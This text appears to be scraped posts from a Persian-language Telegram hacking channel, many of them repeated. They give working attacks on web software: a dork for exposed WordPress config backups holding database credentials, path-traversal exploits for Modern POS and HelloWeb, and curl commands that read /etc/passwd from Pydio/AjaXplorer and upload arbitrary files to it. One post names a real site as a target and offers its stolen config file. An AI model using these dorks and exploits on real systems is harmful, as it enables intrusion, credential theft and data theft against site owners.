#DoRk - #Wp_Config (.bak = backup file ) #file
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Arbitrary #File #Download #LFI #RFI #Modern_POS v1.3
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::
_inc/bridges/php-local/index.php?action=download&path=../../../config.php
_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
http://localhost/[PATH]/
این قسمت دامین شما یا تارکت میباشد._inc/bridges/php-local/index.php
?action=download&path=
با اضافه کردن این قسمت به اخر دامین به محل اسیب پذیری دسترسی پیدا میکنید.[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::
_inc/bridges/php-local/index.php?action=download&path=../../../config.php
_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)
CodeCanyon
Modern POS - Point of Sale with Stock Management System
Modern POS is built with core PHP, jQuery and Angular JS and Others modern technology. There are many attractive features that will help you to manage stock and sales of your shop easily.
...
...
🔺🔻🔸🔹🔶🔷
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
/plugins/editor.zoho/agent/files
ادرس پیشفرض برای خواندن فایل های اپلود شده :/plugins/editor.zoho/data/files/
➖➖➖➖➖➖➖➖➖➖#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
Telegram
AttachLearnExploit
File.xml
1.5 KB
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3 #XXE #File
➖➖➖➖➖➖➖➖
فایل استفاده شده در اموزش
(از قلم افتاده 😁)
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
فایل استفاده شده در اموزش
(از قلم افتاده 😁)
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
#Target #Config #File :)
➖➖➖➖➖➖➖➖➖
#Target :
batikkratonmas.com
#Config File :
Download
➖➖➖➖➖➖➖➖➖
Don't Forget ; I'm Here
IR0Day.Today
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖
#Target :
batikkratonmas.com
#Config File :
Download
➖➖➖➖➖➖➖➖➖
Don't Forget ; I'm Here
IR0Day.Today
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش آسیب پذیری file inclusion در Dvwa
#windows #dvwa #file_inclusion
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#windows #dvwa #file_inclusion
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش آسیب پذیری File Upload در Dvwa
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
* در این آموزش از Burp Suite هم استفاده شده است *
#windows #dvwa #File_Uploadiliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army